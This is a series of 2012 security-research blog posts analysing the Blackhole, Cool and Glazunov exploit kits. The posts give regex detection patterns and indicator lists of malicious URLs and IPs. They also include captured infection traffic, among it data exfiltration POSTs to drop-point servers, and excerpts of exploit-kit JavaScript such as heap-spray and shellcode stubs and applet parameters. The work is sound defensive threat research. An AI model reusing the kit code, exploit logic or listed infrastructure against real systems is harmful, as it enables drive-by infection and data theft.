Parentesis URL Pattern, Likely Associated with Badness

I ran into an interesting URL pattern containing parenthesis in a specific method. On deeper inspection, it looks like this pattern may be associated with badness, the details of which I am not certain but thought good enough to bring to the community. 


My research on this so far indicates that some of the URLs are associated with known Zeus/Spyeye C2 servers, and a large number of these patterns hosted on legitimate sites whose subdirectories containing these patters are not indexed by Google. Also, it appears this pattern has been active for some time and may have been identified by other researchers, I am not sure.

Some URLquery patterns show redirects to a domain that was reported in December associated with drive by downloads in an Andriod forum which is no longer operational (at least today).

The observations at this time are that these are redirects, or contain redirects, to badness which is why I am bringing it to the community.

The URL pattern in question is:

\(s\(\w{24}\)\)?\/\w{2,}\.aspx

There is one URLquery report on this type of URL here. On inspection, this report shows a series of get requests including one URL which traces back to a report on undroid.us as containing badness ( hxxp://zirycatum.com/k985ytv.htm). I also noticed the k985ytv.htm more than once.

And I'm not alone in looking at this, going back a while now.

AVG did recognize the content.

Jsunpack 

www.undroid.us/wordpress/?cat=19
Dec 8, 2012 - 2. zirycatum.com (ex: hxxp://zirycatum.com/k985ytv.htm) 3. numudozaf.com (ex: hxxp://numudozaf.com/k985ytv.htm) Above all resolve to the same Moldova (south ...

Any feedback or further info, hit me up @fknsec

I have not researched if any IDS (Snort) sigs match this pattern.

HAPPY NEW YEAR





References:
http://urlquery.net/report.php?id=14666
www.undroid.us/wordpress/?cat=19
http://jsunpack.jeek.org/?report=fc505de91ae02e6ed905bb22746975e5d4d70c93
http://forums.cnet.com/7726-6132_102-3375245.html

Unrecognized URL Pattern Involving Malware Binaries

In the interests of keeping FPs to a minimum, i'm including the mooo.com, but pull it out if you want to test your site for FPs. This appears to be designed to deliver malware binaries and at this point I do not have further to share. I would keep an eye out for this one and feedback any info please @fknsec #teamwork.

Pattern type 1

mooo\.com\/\w{2,8}\d{3}\_\d{4}\.php\?\w{4,10}\=

Pattern type 2 (appears to be only binaries)

mooo.com\/\?\w{2,9}\=[a-zA-Z0-9]{16,}

Pattern type 1 examples:

   hxxp://www2.e77lzbgasyhun.mooo.com/udhnj106_5613.php?8tpb=XN/p2KKso9zwx9vOme7R2attqqGVi6eg0LeVj...   
2012-12-14
    hxxp://www2.e77lzbgasyhun.mooo.com/zkzd106_5613.php?qamk2=lczm4W/ao6fi39bUh+jizLKjp5KgkaLOm3Sfo...   
2012-12-14
    hxxp://www2.tf6qzs0witws-0.mooo.com/dxohf241_5874.php?zh2cgpfl=nt6gy92ty9rZ16mX79yUtJ6srqdToOPM...   
2012-12-14
    hxxp://www2.f32w14gqqvnfax.mooo.com/owxryn107_5613.php?l4uv0n=kKfX723h3aek4ppa3NrVs6OckquSpN7ab...   
2012-12-14
    hxxp://www2.id0hx24nz8.mooo.com/twp211_5613.php?wzapem=m+XV6aLa29ak0epYqdfedaywkqOL3dLIbZuek5bQ...   
2012-12-14
    hxxp://www2.q04leu6wmk.mooo.com/nnxybd231_5619.php?qzgoh7=leXP26Wa0p6h14vqn9uqoKeroJXYoNVtZ5LG1...   
2012-12-14
    hxxp://www2.r4qjwq40c4.mooo.com/uxm211_5613.php?te47u=mN6WobLaluLO6dWfVtid2KJpbaalWuHT265nVsSW1...   
2012-12-14
    hxxp://www2.i9cofxif5uz6i7.mooo.com/vigpkh241_5688.php?9dyzjo2pw=Xdfn3eTnb+jg4KPd3ozt0spyqrBuoV...   
2012-12-14
    hxxp://www2.r4qjwq40c4.mooo.com/taedi107_5613.php?11zq1=Vabf5ZWvq97N3eWtVtidlW6vp2KlWuHT265nVsS...   
2012-12-14
    hxxp://www2.poqjik8iv0.mooo.com/yhxvgz106_5613.php?09rrso=VJ/o1djjrdLq193bno/rmZR2p6ikopbf2s6mn...   
2012-12-14
    hxxp://www2.e77lzbgasyhun.mooo.com/bdj106_5613.php?cmlw7lm=h9jl7XTh2dWtnODniNzK17adq5+Wk9zgm6mg...   
2012-12-14
    hxxp://www2.i9cofxif5uz6i7.mooo.com/fdje106_5613.php?pae5=lNjIodF2zuXL3NeMqt7ec55toZSLpdKdoKKM2...    /mxatxt241_5813.php?954u91o4yx=XZmV63af1Zvm4tPlj9uZ13KkbWemV6...   
2012-12-14
    hxxp://www2.poqjik8iv0.mooo.com/dano107_5613.php?0bqhdq36=VNDX3Myul63e2+eQ3tScpqtmYZWX2M3VcGmW0...   
2012-12-14
    hxxp://www2.poqjik8iv0.mooo.com/vqepgx107_5613.php?g9fm=i6fM4dis1eHX166P65nLdpujoaKX2tLPdZyckcm...   
2012-12-14
    hxxp://www2.e77lzbgasyhun.mooo.com/ppjdu106_5613.php?mteo6tgk=kd/e5XPp09vbnKvZoNfQxbCunqahk+TO0...   
2012-12-14



Pattern Type 2: Binary (as per Exploit Shield)

2012-12-13 17:13	http://www2.v-iy381t22z638.mooo.com/?0aimsen=VMTW0bDK5ttT3uKXdWara....	78d5758eebe3df79ffd40efef16af944	7/45
2012-12-13 17:12	http://www2.v-iy381t22z638.mooo.com/?slwo4wee=l8%2Fk03Hc3cqcotLdcG....	597f409a3f786a960b8683b4bb9ebdc7	12/46
2012-12-13 17:08	http://www2.v-iy381t22z638.mooo.com/?ugmrldkb=mcra1qnJ48ecotLdcG1o....	1526a20a234749ae4cd61fa1e95e8559	12/46
2012-12-13 17:05	http://www2.v-iy381t22z638.mooo.com/?tkln=mM7Z0rOS4d5ZrZrYb2exbWle....	70bc0edd237458587de240b8ef71a0d5	scanning...
2012-12-13 17:04	http://www2.v-iy381t22z638.mooo.com/?xl0r=nM%2Bd1rOS4d5ZrZrYb2exbW....	337ac36ee8544e342200a85e38c88ce6	12/46

2012-12-14 13:52	http://www2.fmrmta0nhmql95.mooo.com/?4audhacuw1=WMTiyKXG29qdps%2FR....	7261465fae1c1d0a9c776658c91da6a8	11/46
2012-12-14 13:51	http://www2.fmrmta0nhmql95.mooo.com/?hyvxj=jNzj3KfL5deT6cqUq52joaJ....	6806bfa3b01fda85105dc265bfb625e2	11/46
2012-12-14 13:49	http://www2.fmrmta0nhmql95.mooo.com/?191lqzd=VZye0K7f3MuT59bYnmWkm....	837b7e8a971805b33b2822677dd446a9	scanning...

2012-12-14 08:01	http://www2.g8gbbckylo8.mooo.com/?smbvs0=l9DP2rCV352N18vHqK6kp22Z4....	49448bafc166568b3b8af8f7fc285ca5	9/45
2012-12-14 08:00	http://www2.g8gbbckylo8.mooo.com/?hgsx1=jMrg3G7MsMyI18zPtqGncJ2N5%....	e426696ef1f1b8c2814c7330cdd9a916	9/45

2012-12-14 01:33

http://www2.ie8qrahzp1jfg4.mooo.com/?uhsr2ea=mcvg1m%2FK2c6LrdrWnp2....

42bd8297b01e1c1a50cf16a74ed8595a

16/45

Case Study: Exploiting Weakness To Quietly Exfiltrate Data

As per Emergingthreats, this is the Glazunov exploit kit.

This particular case is an excellent example to demonstrate that malware authors do their best to avoid detection and do not play by the internet rules. The utilization of defense in depth is a critical component to any information security program and would assist in limiting the damage from an attack of this nature.

This example shows:

• A compromised site/malicious site which is, for the better part, unrecognized.
• A redirect to HTTP TCP port 8080 direct to IP
• Content delivery which appear innocuous in URL logs.
• Java exploits which are not detected by virtually any AV
• Malware which is not detected
• Exfiltration of data on high ports showing as only TCP connections
• Utilizing other people's IP addresses as drop points

This was achieved because of the following gaps in security:

• Endpoint did not have updated Java version and was vulnerable
• Web filtering did not block direct to IP requests
• Layer 7 filtering was not performed at the perimeter (IPS) for the exploit code.
• AV did not detect the malware
• Outbound ports were not restricted. The endpoint could communicate outbound.

The entry point is a 301 redirect, however the content length is a28 and there is what AVG recognizes as a Blackhole redirect in the 301 response. 
hxxp://www.helloooooo.com/2009/01/splinter-impostor-claims-worlds-longest-hair/
This is a dangerous website and should not be visited in a browser.






The next step is for me to get the redirect URL.


GET /2009/01/splinter-impostor-claims-worlds-longest-hair/ HTTP/1.1
Accept: */*
Accept-Language: en-us
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)
Accept-Encoding: gzip, deflate
Host: www.helloooooo.com
Connection: Keep-Alive


And gives me a gift... to quote my friend Tarun.
HTTP/1.1 200 OK
Date: Tue, 27 Nov 2012 00:10:10 GMT
Server: Apache/2.2.3 (CentOS)
X-Pingback: http://www.helloooooo.com/xmlrpc.php
Link: <http://www.helloooooo.com/?p=1892>; rel=shortlink
Connection: close
Transfer-Encoding: chunked
Content-Type: text/html; charset=UTF-8
5244
<script>if(window.document)try{new location(12);}catch(qqq){aa=[]+0;aaa=0+[];




The redirect is to a rigo6680.zapto.org/?go=2, this is consistent with TDS redirects.


http://jsunpack.jeek.org/?report=a41f7d02a6ef035c6808676b1cbd74814d53c88b


Additional redirects appear everywhere on the page, see the CSS redirect below.

Redirect from a CSS file.
http://wepawet.iseclab.org/view.php?hash=38d20de85abbc89a79ad6901b4f7becb&type=js&t=1354367725

What happens next?

The following URL chain occurs. Included in here is a youtube video, 74.125.x.y ip address.


609  31.956187  10.1.2.3 -> 74.125.236.9 HTTP 408 GET /v/hYaYCPmFWKw&hl=en&fs=1 HTTP/1.1
613  32.126215  10.1.2.3 -> 65.163.12.222 HTTP 454 GET /wp-content/themes/twentyten/images/wordpress.png HTTP/1.1
616  32.196442 65.163.12.222 -> 10.1.2.3  HTTP 1152 HTTP/1.1 200 OK  (PNG)
625  32.545505 74.125.236.9 -> 10.1.2.3  HTTP 674 HTTP/1.1 200 OK  (application/x-shockwave-flash)
637  33.374071  10.1.2.3 -> 64.34.183.111 HTTP 335 GET /2354796716/12230 HTTP/1.1
673  33.543459  10.1.2.3 -> 74.125.236.1 HTTP 382 GET /yts/swfbin/watch_as3-vfl1ubMZd.swf HTTP/1.1
688  33.587050 64.34.183.111 -> 10.1.2.3  HTTP 104 HTTP/1.1 200 OK  (application/x-java-archive)
695  33.626438  10.1.2.3 -> 64.34.183.111 HTTP 292 GET /2354796716/12230 HTTP/1.1
744  33.867125 64.34.183.111 -> 10.1.2.3  HTTP 104 HTTP/1.1 200 OK  (application/x-java-archive)
770  34.193535  10.1.2.3 -> 64.34.183.111 HTTP 245 GET /15692 HTTP/1.1
931  34.501338 64.34.183.111 -> 10.1.2.3  HTTP/DL 958 unknown (0x4d)

Here's the Java.

And we run the Java, which contains CVE 2012-1723 and the binary materializes and is executed immediately.

Posting Data to Drop Points

What we get are connections on TCP port 35516 posting  data to compromised Windows servers online. What is interesting about this is that it is not recognized as HTTP. It is only protocol TCP and on outbound port 35516. This would fly under the radar of many detection mechanisms.

This infection is a wonderful case study in an infection chain using difficult to detect methods and exploiting weaknesses in infrastructure, perimeter security and vulnerable workstation software.

Four IP addresses were drop points:
131.96.243.22
74.59.207.114
68.197.117.117
87.203.78.137

The infection point is 64.34.183.111:8080

Here is what the Posting looks like.

VT for Jar file. CVE 2012-1723 - 2/46

https://www.virustotal.com/file/4f88dd9dbeaba9a59ab1c077b4e98be72c66e59f79ad8cc95c0952530ca698f3/analysis/1354328781/

ed-309-aaenak.gsu.edu

Raw POST information

POST /nymain/nm1932719/index.php HTTP/1.1
Host: 131.96.243.22
Content-Length: 54
Accept-Encoding: deflate
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0)
Pragma: no-cache
Cache-Control: no-cache
Connection: close

filename=bphgt.ntz&data=œT¬»ñOõ[!5a9±r8ÆàSÞ¼ƒAôˆPöêÙ

HTTP/1.1 200 OK
Content-Length: 4
Connection: close

[

------------------------------------------------------------------

POST /nymain/nm1932719/index.php HTTP/1.1
Host: 74.59.207.114
Content-Length: 58
Accept-Encoding: deflate
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0)
Pragma: no-cache
Cache-Control: no-cache
Connection: close

filename=skjlrke.kcf&data=¾¤±ß]NçWB\—%~}SóC坣tZ‡£¬4Ø–‘

videotron.ca (1) 



Host: modemcable114.207-59-74.mc.videotron.ca

@fknsec

All investigations were performed in my personal lab. This article's content and any opinions expressed are not the opinions of any past, present or future employer. Lawyers are our friends.

Blackhole 2.0.1 Exploit - URL Pattern

Blackhole Exploit Kit 2.0.1 - URL Pattern

Written by Frank Angiolelli, CISSP

Blackhole 2.0 has evolved into Blackhole 2.0.1 which incorporates the 2012-5076 and the URL structure has evolved. Currently, there are iframes built with adjustments to the URL that include what appear to be hard coded values.

Example:
<iframe src="/obtaining/notify- publishes_ post-used. php?tvipazdb=1l:1f:33:1n:1j&bkb=j& zizcdg=30:1n:1h :30:1n:33:30:1m: 2v:32& edd=1f:1d:1f:1d:1f: 1d:1f"></iframe>

The PDF:

The PDF get request that I have research and observed recently consistently contains the following string:

"1n:1d:1f:1d:1f:1d:1j:1k:1l"

So patterned out, it looks like this:

\.php\?\w{2,8}\=((1|2|3)[a-z0-9]\:){4}(1|2|3)[a-z0-9]\&\w{2,8}\=[a-z0-9]{2}\&\w{2,8}\=((1|2|3)[a-z0-9]\:){9}(1|2|3)[a-z0-9]\&\w{2,8}\=1n\:1d\:1f\:1d\:1f\:1d\:1j\:1k\:1l

Additionally, it appears that the second parameter value is consistently a 2 character value, though no longer hexadecimal. Ostensibly, the structure pattern is the same with some minor variations to throw off detection.

It should be noted this may not catch every single variation, but currently I know there are enough matches to make this likely valuable.

Examples:
/links/excuse_lorrys-names-carries.php?iucvwm=2w:31:33:1o:1g&rxjw=3j&aqpmcap=2w:1k:30:31:1j:1h:33:1m:1f:33&zprptb=1n:1d:1f:1d:1f:1d:1j:1k:1l

/pleasing/forward-facts.php?dht=1g:2v:33:2v:2w&hxala=33&nbz=33:1l:1g:2v:30:1m:33:32:1l:1k&zrchhlmf=1n:1d:1f:1d:1f:1d:1j:1k:1l

hxxp://cosmic-calls.net/detects/mixing-evened-quits-spot.php?xpu=2w:31:33:1o:1g&ftzajz=3a&jlzjamgn=1k:2w:32:30:1n:1h:33:31:2v:2w&xlxsjzzi=1n:1d:1f:1d:1f:1d:1j:1k:1l

/less/pounds-value_mean.php?fhkguehd=31:2v:30:1i:1o&vcyvea=36&qpqvia=1n:30:30:31:2v:2w:1o:1f:1f:31&pjqnyncg=1n:1d:1f:1d:1f:1d:1j:1k:1l

The Java:

The Java request when used as the direct exploit is identical to the entry point URL in my investigations, however the content type is adjusted to application/x-java-archive. See the exploit chain towards the end of this article. I am unsure of what the structure looks like after a PDF is served.

The Binary:

Additionally, the URL structure is in a similar format to the 2.0 URL structure in that the binary get request first parameter has 10 characters - though they are no longer hex and the second parameter contains 20 characters - again, not hex. These values are now separated by colons.

An the binary get request appears at this time to match the following pattern. Please feedback any false positives to me. This is slightly wide to allow for additional variants I may not be seeing. Suggestions for adjustments, optimization or false postives - please feedback to @fknsec.

\.php\?(\w{2,8}\=((1|2|3)[a-z0-9]\s?\:\s?){4}(1|2|3)[a-z0-9]\&)(\w{2,8}\=((1|2|3)[a-z0-9]\s?\:\s?){9}(1|2|3)[a-z0-9]\&)\w{1,8}\=\w{2}\&\w{2,8}\=\w{1,8}\&\w{2,8}\=\w

The primary difference observed at this point is that the Blackhole 2.0.1 favors serving the Java 2012-5076 exploit before the Adobe PDF is served, as seen with systems having Java 6u35 and Adobe 9.x. In my previous article on Blackhole 2.0, the kit exclusively served a PDF file first.

Binary Examples:
/less/pounds-value_mean.php?if=1i:1m:2w:1g:1o&pe=1n:30:30:31:2v:2w:1o:1f:1f:3
1&k=1f&rg=m&ht=b

hxxp://62.109.24.128/links/excuse_lorrys-names-carries.php?df=1o:1l:31:1o:1f&ne=2w:1k:30:31:1j:1h:33:1m:1f:33x=1ffb=gci=b

http://syenial.com/links/1.php?rf=1k:1g:1i:1i:1m&oe=1j:1n:1m:1l:1m:2w:31:1j:1m:1g&p=1f&rq=x&vf=d

Blackhole 2.0.1 In Action:

GET /less/pounds-value_mean.php HTTP/1.1
Accept: application/x-shockwave-flash, image/gif, image/jpeg, image/pjpeg, */*
Accept-Language: en-us
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)
Accept-Encoding: gzip, deflate
Host: u91s.info
Connection: Keep-Alive

HTTP/1.1 200 OK
Server: nginx/1.0.15
Date: Sat, 24 Nov 2012 19:33:55 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive


f86
<html><head><title></title></head><body><object classid="clsid:8AD9C840-044E-11D1
-B3E9-00805F499D93" codebase="http://java.sun.com/update/1.6.0/jinstall-6u60-wind
ows-i586.cab#Version=6,0,0,0" WIDTH="200" HEIGHT="200" ><PARAM NAME="CODE" VALUE=
"hw"><PARAM NAME="ARCHIVE" VALUE="/less/pounds-value_mean.php"><param name="type"
value="application/x-java-applet"><param name="val" value="0b0909041f"/><param n
ame="prime" value="3131213e37193c323a2c173143351919310417213a0019220e1a4321350c23
351a3a3c040b043d322c3937321f37231f270a1f37051f371702043539373a1f081c1f081c1f08371
f270e1f270a1f37171f372c1f372c1f0837021139372c0244053923020b093928"/></




Then:




GET /less/pounds-value_mean.php HTTP/1.1
accept-encoding: pack200-gzip, gzip
content-type: application/x-java-archive
User-Agent: Mozilla/4.0 (Windows XP 5.1) Java/1.6.0_29
Host: u91s.info
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
Connection: keep-alive


HTTP/1.1 200 OK
Server: nginx/1.0.15
Date: Sat, 24 Nov 2012 19:33:58 GMT
Content-Type: application/java-archive
Connection: keep-alive
Content-Length: 10940
ETag: "c9a6c96d607f63a618e07759c2f7391e"
Last-Modified: Sat, 24 Nov 2012 19:32:36 GMT
Accept-Ranges: bytes


PKñ¨vAMETA-INF/þÊPKPKñ¨vAMETA-INF/MANIFEST.MFóMÌËLK-.ÑK-*ÎÌϳR0Ô3àår.JM,IMÑuª˜éÄ+
h—æ)øf&åW—¤æ+xæ%ëiòrù&fæé:ç$[)d”órñrPK­Añ WWPKu¥vAhw.class




Finally the Binary:



GET /less/pounds-value_mean.php?if=1i:1m:2w:1g:1o&pe=1n:30:30:31:2v:2w:1o:1f:1f:3
1&k=1f&rg=m&ht=b HTTP/1.1
User-Agent: Mozilla/4.0 (Windows XP 5.1) Java/1.6.0_29
Host: u91s.info
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
Connection: keep-alive


HTTP/1.1 200 OK
Server: nginx/1.0.15
Date: Sat, 24 Nov 2012 19:33:59 GMT
Content-Type: application/x-msdownload
Connection: keep-alive
Content-Length: 131072
Pragma: public
Expires: Sat, 24 Nov 2012 19:32:37 GMT
Cache-Control: must-revalidate, post-check=0, pre-check=0
Cache-Control: private
Content-Disposition: attachment; filename="contacts.exe"
Content-Transfer-Encoding: binary


MZÿÿ¸@躴Í!¸LÍ!This program cannot be run in DOS mode.


References:
http://www.securitynotes.ro/2012/11/discovering-blackhole-part-i.html
http://integriography.wordpress.com/2012/11/19/dissecting-a-blackhole-2-pdf-mostly-with-peepdf/
http://wepawet.cs.ucsb.edu/view.php?type=js&hash=baeccb2947004ded2dc9079e89e42b41
https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgrH3ELFCs_SJwhmmh6aLTFCPqS-rR_ln5dYJ57CUbUM5of7XPs3wLD-QlDVwEtq-68uGKj9fXDbyiCjW0aHR-OKY38txLQ6evHgM2dYbsce0cMmEN7Druq_OtZVgzm-YFpA9tMyzhmGixg/s1600/screenshot_1451.png
http://www.scumware.org/report/94.250.251.61

Cool Exploit Kit - URL Structure

The write up from malware.dontneedcoffee.com on Cool Exploit Kit is excellent.

Here, I will concentrate on how it is operating with an emphasis on detection based on URL structure. Please note, variants are possible and these may change, but as of now, this is what I am seeing. More to come, check back again.

Cool Exploit Kit URL Structure

The static entries in the observed Cool Exploit Kit contains the following URLs.


/32size_font.eot
/64size_font.eot
/media/field.swf
/media/pdf_new.php
/media/pdf_old.php
/media/score.swf
/media/new.jar
/media/file.jar
/bagdfssdb.jar
/flash.swf?info=[a-f0-9]{32,}

Binary Regex: \/[a-z]\/f\.php\?k=\d(&e=\d&f=\d)?$
(Credit Emergingthreats sid:2015873)

The current implementations of this exploit kit reside under single letter subdirectories. i.e. "/r/media" or "/t/media", but it appears any single letter is possible.

Known Repeat Offenders:

46.21.148.217
184.170.142.13
85.143.166.112
193.0.179.5

PluginDetect 0.7.9

  <body onload='try{window.focus();}catch(e){}'>
var PluginDetect={
        version:"0.7.9",

It is using plugin detect. It is doing the math and extracting the version numbers, I think we are all familiar with this (beating a dead horse).

JavaVersions:[[1,9,1,40],[1,8,1,40],[1,7,1,4

0],[1,6,0,40],[1,5,0,30],[1,4,2,30],[1,3,1,30]],query:function(){
                var a=this,e=a.$,b=a.$$,c=(a.hasRun||a.disabled());
                a.hasRun=1;
                if(c){
                  return a}
                var i=[],k=[1,5,0,14],j=[1,6,0,2],h=[1,3,1,0],g=[1,4,2,0],f=[1,5,0,7],d=b.getInfo?true:false,l={
                };

Now, let's look deeper into what is it is asking for based on your versions:

Flash

function getCN(){        return "../media/score.swf"}      function getBlockSize(){        return 1024}      function getAllocSize(){        return 1024*1024}      function getAllocCount(){        return 300}      function getFillBytes(){        var a='%u'+'0c0c';        return a+a}      function getShellCode(){
oSpan.innerHTML="<object classid='clsid:d27cdb6e-ae6d-11cf-96b8-444553540000' width=10 height=10 id='swf_id'><param name='movie' value='../media/field.swf' />

Then we have this possibility

<param name='movie' value='../media/flash.swf?info="+avmurl+"' /><embed src='../media/flash.swf?info="+avmurl+"' name='asd' align='middle' allowNetworking='all' type='application/x-shockwave-flash' pluginspage='http://www.macromedia.com/go/getflashplayer'></embed></object>"}

While leads to something like this:
hxxp://monstercompanionsbonuses.info/data/flash.swf?info=02e6b1525353caa8adb5b7b55154335730b4b55732b6b17e08e8888930f129f18f4889a8888f096949898e70487096a91637293629b67a4b726e7f


Ok great, we have score.swf, flash.swf?info= and field.swf. This is strangely familiar (rolling eyes).

Cool Exploit PDF Logic

In the PDF logic, if the version of Adobe detected is lower than 8, it sets a variable vver to "old", if it is greater than or equal to 8, it sets vver to new. The exploit is recognized as Adobe PDF Memory Corruption /Ff Dictionary Key CorruptionI

if (pdf[0] < 8){
          vver = "old";
          setTimeout("FlashExploit()", 8003);

else if (pdf[0] == 8 || (pdf[0] == 9 && pdf[1] < 4)){
          vver = "new";
          setTimeout("FlashExploit()", 7004);

d.innerHTML = '<iframe src="../media/pdf_' + vver + '.php"></iframe>';

So now what does it do with this information?

It builds a URL "/media/pdf_ +vver + .pdf - so /media/pdf_new.php" or /media/pdf_old.php'

Now, let's look at the Java:

          if (javax[1]==7){
            variant = "new";
            val1="0b0909041f";

     val2="313109441a3a19041744093c0b32091a3a0044213a3c38383144312c3c040b043d1139270235391c022c391c";

 else {
            variant = "file";
            val1="0b0909041f";
              val2="313109441a3a19041744093c0b32091a3a0044213a3c38383144312c3c040b043d1139370235391c022c391c";

WIDTH="200" HEIGHT="200"><PARAM NAME="CODE" VALUE="bagdfssdb"><PARAM NAME="CODEBASE" VALUE="../media/"><PARAM NAME="ARCHIVE" VALUE="' + variant + '.jar"><param name="type" value="application/x-java-applet;version=1.6"><param name="val" value="'+val1+'"/><param name="prime" value="'+val2+'"/></object>';.

Notice the "codebase" value = ../media/". Great.
So presumably, we should be looking for get requests containing "/media/", so each of these files resides under media, with the potential exception of some of the jar files whose structure appear to be built from parameters inside the exploit kit.

I also ran into hxxp://now.kitchenssinks.co.uk/t/media/new.jar

I am still looking into the predictability of additional jar files.


Binary:
So far, the only binary get request I have been able to observe is /f.php?k=. It should be noted that there are known variations with additional parameters which is represented well by Emergingthreats Regex \/[a-z]\/f\.php\?k=\d(&e=\d&f=\d)?$

Conclusion:

The Cool Exploit Kit can be detected in its current form. I hope to have more soon. As always, I welcome thoughts, comments and collaboration. @fknsec

References:

http://malware.dontneedcoffee.com/2012/11/cool-ek-hello-my-friend-cve-2012-5067.html
http://threatpost.com/en_us/blogs/new-java-attack-introduced-cool-exploit-kit-111212
http://www.malwaredomainlist.com/forums/index.php?action=recent
http://www.avgthreatlabs.com/webthreats/info/cool-exploit-kit/
http://jsunpack.jeek.org/?report=6aa9697f44b5f61ba3cb76b64935694c351f35ff
http://doc.emergingthreats.net/bin/view/Main/2015887

Deeper into Blackhole, URLs and dialects.

Written by Frank Angiolelli, CISSP

I am still focused on Blackhole URLs, specifically the binary get request. As I look deeper into the URL, tightening up the regex seems possible, as well as broadening the detection to catch those that use longer hex values. There are distinct dialects in the binary get request that are emerging.


The improved Regex

Binary Get Request:

\.php\?\w{2,8}\=(0[0-9a-b]|3[0-9]){5,32}\&\w{2,9}\=(0[0-9a-b]|3[0-9]){10}\&\w{1,8}\=\d{2}\&\w{1,8}\=\w{1,8}\&\w{1,8}\=\w{1,8}

Optimized by suggestions from Will Metcalf @node5. Thanks Will.

PDF Get Request:

\.php\?\w{2,9}\=(0[0-9a-b]|3[0-9]){5}\&\w{3,9}\=(3[0-9a-f]|4[0-9a-f])\&\w{3,9}\=(0[0-9a-b]|3[0-9]){10}\&\w{3,9}\=(0[0-9a-b]{1,8})00020002

Thanks to @Dr4g0nFlySm0k3 for widening out my sample set and testing.

Dialects in the Binary Get Request:

While the exact meaning of the dialects is unknown to me at this time, there are three distinct dialects I have seen in the binary get requests in the wild up to this point. By dialects, I'm referring to a particular pattern variation which is similar among groups of binary get requests.

Dialect 1: The 2by10
In this dialect, the first parameter is 2 letters followed by 10 hex (2by10). The second parameter is 2 characters followed by a 20 hex(2by20), then 1 character followed by two digits(1by2), 2by1 and 2by1. This seems to be the most common that I have seen in the wild and was the basis for my first regex to detect the binary.
/forum/links/column.php?tf=0735020b0b&ve=3307093738070736060b&f=02&nu=j&rw=m

Dialect 2: The 3by10
In this dialect, it goes 3by10, 3/4by20, the remainder varies however the third parameter is consistently a two digit number. I do not have enough of these to extrapolate a predictable pattern yet.

Dialect 3:The 4/5/6by64
In this dialect, the first parameter is 4,5 or 6 letters followed by a 64 character hex (4/5/6by64). The second parameter is 8 or 9(char) by 20 character hex (8/9by20). There is fluctuation in the remaining parameters but the third parameter is always a two digit number.
/links/tune-spreads-action.php?uxytgf=3306380338020a0b0b02360609350608350409050334350933080a3505063308&abnczdde=06090a3708050a063402&jvfagfn=02&pusr=uwelha&tibqqyl=rpfarbmb

/detects/stones-instruction_think.php?hij=0802340202&fwi=0b0a33350a0735020405&nktu=03&wai=mpevbgmy&xsrpwq=rjbgqjpy

This is only my observations of the values in the field and could represent a fingerprint which could be used to identify different actors, different versions of the exploit kit or different setups of the exploit kit.

What are the Hex values?

The hex values are comprised of two separate things, randomized garbage values and numeric digits intermixed. All hex values are either 00-0b or 30-39. the 00-0b are likely garbage, while the 30-39 represent numbers.

Any of us that analyzed or detected the old version of blackhole are familiar with the old f= & e= parameters, well I'm here to tell you it appears they still exist, only they have been morphed. In the new version of blackhole contains the same parameters obfuscated by using garbage hexidecimal values mix into each number as well as random characters inserted for good measure.

Let's break down one of the URLs.
/forum/links/column.php?tf=0735020b0b&ve=3307093738070736060b&f=02&nu=j&rw=m

0735020b0b = 5
07 = bell
35 = 5
02 = start of the text
0b = vertical tab
0b = vertical tab

3307093738070736060b = 3786
33 = 3
07 = bell
09 = Horizontal tab
37 = 7
38 = 8
07 = bell
07 = bell
36 = 6
06 = Acknowledge
0b = Vertical tab


Let's do another one.
/links/observe_resources-film.php?gf=050934030b&fe=0a050304380b37370a36&c=02&pr=n&od=v

050934030b = 4
05 = Enquiry
09 = Horizontal tab
34 = 4
03 = EndofText
0b = bell

0a050304380b37370a36 = 8776
0a = Line feed
05 = Enquiry
03 = EndofText
04 = EndofTransmission
38 = 8
0b = bell
37 = 7
37 = 7
0a = Line feed
36 = 6


Both of these URLs are of dialect 2by10. You will note that the first parameter turns out to be a single digit while the second value is four digits.


Now let's go back to the fake AV infection URLs I looked at on September 15th
hxxp://108.178.59.39/links/reveals_formed.php?udvf=03080407333603030a3302340235073836093508033706363836353505080833&tvaxpmbue=0a09380b0a3508360208&rdm=02&bnvru=dolz&gwxjfli=ewsxs


03080407333603030a3302340235073836093508033706363836353505080833 = 363458657686553


0a09380b0a3508360208 = 856

This follows a 4by64 dialect and the value of the first parameter is 363,458,657,686,553 and the second is 856.

Now Let's look at another one:
/links/tune-spreads-action.php?uxytgf=3306380338020a0b0b02360609350608350409050334350933080a3505063308&abnczdde=06090a3708050a063402&jvfagfn=02&pusr=uwelha&tibqqyl=rpfarbmb

This is a 6/64 dialect where the first parameter equals 38,865,545,353 and the second parameter equals 74.

Thanks to those who contributed their URLs to help broaden the analysis set and @Dr4g0nFlySm0k3  for discussions on the subject. #malwaremustdie.

Blackhole 2.0 Binary Get Request

Written by Frank Angiolelli, CISSP

I am still focused on Blackhole 2.0 and in my last article here, I examined the URL pattern. The regex in this previous article is good at detecting the entry points and the exploit as it is occurring, but not the binary get request. This was because of too many false positives for sites like facebook (credit for the teamwork to @Dr4g0nFlySm0k3). Today, I focused on getting the pattern for the binary get request.

This is an ongoing series where my intel will be posted as I get it. Feedback to me on twitter @fknsec. Also, check out #malwaremustdie on twitter.

Blackhole 2.0 Entry Point/PDF/PK Pattern
     Content type/MIME type:application/pdf

\.php\?\w{2,10}\=[0-9a-f]{10}\&\w{2,10}\=[a-z0-9]{2,6}\&[a-z]{2,8}\=[a-z]{2,10}\&[a-z]{2,8}\=[a-z]{2,8}$

  

Blackhole 2.0 Binary Get Request Pattern
 Content type/MIME Type: application/x-msdownload

\.php\?\w\w\=[a-f0-9]{10}\&\w\w\=[a-f0-9]{20}\&\w\=[0-9]{2}\&\w\w\=\w\&\w\w\=\w$

     

Blackhole 2.0 - All About the PDF

Screen Cap 1:
Adobe Reader uninstalled, still prompts for PDF.

